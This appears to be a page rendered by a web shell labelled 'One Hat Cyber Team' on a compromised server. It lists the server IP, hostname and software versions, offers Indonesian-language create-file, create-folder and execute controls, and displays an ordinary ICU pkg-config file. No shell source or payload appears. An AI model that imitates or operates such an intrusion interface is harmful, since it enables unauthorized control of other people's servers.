One Hat Cyber Team
Your IP :
18.222.168.73
Server IP :
103.133.214.160
Server :
Linux venus.ewebguru.net 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software :
Apache/2
PHP Version :
8.1.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
pkgconfig
/
View File Name :
icu-uc.pc
# Copyright (C) 2016 and later: Unicode, Inc. and others. # License & terms of use: http://www.unicode.org/copyright.html # Copyright (C) 2010-2013, International Business Machines Corporation. All Rights Reserved. # CFLAGS contains only anything end users should set CFLAGS = # CXXFLAGS contains only anything end users should set CXXFLAGS = -std=c++11 # DEFS only contains those UCONFIG_CPPFLAGS which are not auto-set by platform.h DEFS = prefix = /usr exec_prefix = /usr #bindir = /usr/bin libdir = /usr/lib64 includedir = /usr/include baselibs = -lpthread -ldl -lm #datarootdir = ${prefix}/share #datadir = /usr/share #sbindir = /usr/sbin #mandir = /usr/share/man #sysconfdir = /etc UNICODE_VERSION=10.0 ICUPREFIX=icu ICULIBSUFFIX= LIBICU=lib${ICUPREFIX} #SHAREDLIBCFLAGS=-fPIC pkglibdir=${libdir}/icu${ICULIBSUFFIX}/60.3 #pkgdatadir=${datadir}/icu${ICULIBSUFFIX}/60.3 ICUDATA_NAME = icudt60l #ICUPKGDATA_DIR=/usr/lib64 #ICUDATA_DIR=${pkgdatadir} ICUDESC=International Components for Unicode Version: 60.3 Cflags: -I${includedir} # end of icu.pc.in Description: International Components for Unicode: Common and Data libraries Name: icu-uc Libs: -L${libdir} -licuuc -licudata Libs.private: ${baselibs}